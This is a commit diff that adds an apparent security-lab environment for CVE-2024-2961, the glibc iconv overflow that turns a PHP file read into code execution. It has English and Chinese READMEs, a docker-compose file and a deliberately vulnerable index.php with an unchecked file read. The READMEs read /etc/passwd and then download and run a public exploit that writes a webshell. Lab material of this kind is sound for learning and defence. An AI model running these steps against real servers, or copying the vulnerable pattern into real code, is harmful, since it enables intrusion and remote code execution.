first commit

php/CVE-2024-2961/README.md

@@ -0,0 +1,47 @@
+# PHP File Read to Remote Code Execution Through GNU C Library Iconv (CVE-2024-2961)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+The GNU C Library is designed to be a backwards compatible, portable, and high performance ISO C library.
+
+The `iconv()` function in the GNU C Library versions 2.39 and older may overflow the output buffer passed to it by up to 4 bytes when converting strings to the ISO-2022-CN-EXT character set, which may be used to crash an application or overwrite a neighbouring variable.
+
+If an arbitrary file read vulnerability in PHP application, you can upgrade it to remote code execution through the `iconv()` issue CVE-2024-2961.
+
+References:
+
+- <https://www.ambionics.io/blog/iconv-cve-2024-2961-p1>
+
+## Vulnerable environment
+
+Execute following command to start a PHP 8.3.4 server with iconv 2.36:
+
+```
+docker compose up -d
+```
+
+After the server is started, you can read the `/etc/passwd` through `http://your-ip:8080/index.php?file=/etc/passwd`.
+
+## Exploit
+
+Before using the [exploit](https://github.com/ambionics/cnext-exploits), you have to prepare a Linux based system and the Python 3.10+.
+
+Install the dependencies:
+
+```
+pip install pwntools
+pip install https://github.com/cfreal/ten/archive/refs/heads/main.zip
+```
+
+Then download and run the POC from <https://raw.githubusercontent.com/ambionics/cnext-exploits/main/cnext-exploit.py>:
+
+```
+wget https://raw.githubusercontent.com/ambionics/cnext-exploits/main/cnext-exploit.py
+python cnext-exploit.py http://your-ip:8080/index.php "echo '<?=phpinfo();?>' > shell.php"
+```
+
+![](1.png)
+
+As you can see, `shell.php` has been written successfully:
+
+![](2.png)

php/CVE-2024-2961/README.zh-cn.md

@@ -0,0 +1,43 @@
+# PHP利用GNU C Iconv将文件读取变成RCE（CVE-2024-2961）
+
+GNU C 是一个标准的ISO C依赖库。在GNU C中，`iconv()`函数2.39及以前存在一处缓冲区溢出漏洞，这可能会导致应用程序崩溃或覆盖相邻变量。
+
+如果一个PHP应用中存在任意文件读取漏洞，攻击者可以利用`iconv()`的这个CVE-2024-2961漏洞，将其提升为代码执行漏洞。
+
+参考链接：
+
+- <https://www.ambionics.io/blog/iconv-cve-2024-2961-p1>
+
+## 漏洞环境
+
+执行如下命令启动一个PHP 8.3.4服务器，其使用iconv 2.36作为依赖：
+
+```
+docker compose up -d
+```
+
+服务启动后，你可以通过`http://your-ip:8080/index.php?file=/etc/passwd`这个链接读取`/etc/passwd`文件。
+
+## 漏洞复现
+
+在使用原作者给出的[exploit](https://github.com/ambionics/cnext-exploits)前，你需要准备一个Linux环境和Python 3.10解释器。
+
+安装依赖：
+
+```
+pip install pwntools
+pip install https://github.com/cfreal/ten/archive/refs/heads/main.zip
+```
+
+然后从<https://raw.githubusercontent.com/ambionics/cnext-exploits/main/cnext-exploit.py>下载POC并执行：
+
+```
+wget https://raw.githubusercontent.com/ambionics/cnext-exploits/main/cnext-exploit.py
+python cnext-exploit.py http://your-ip:8080/index.php "echo '<?=phpinfo();?>' > shell.php"
+```
+
+![](1.png)
+
+可见，我们已经成功写入`shell.php`：
+
+![](2.png)

php/CVE-2024-2961/docker-compose.yml

@@ -0,0 +1,8 @@
+version: '2'
+services:
+ web:
+   image: vulhub/php:8.3.4-apache
+   volumes:
+    - ./index.php:/var/www/html/index.php
+   ports:
+     - "8080:80"

php/CVE-2024-2961/index.php

@@ -0,0 +1,3 @@
+<?php    
+$data = file_get_contents($_POST['file']);
+echo "File contents: $data";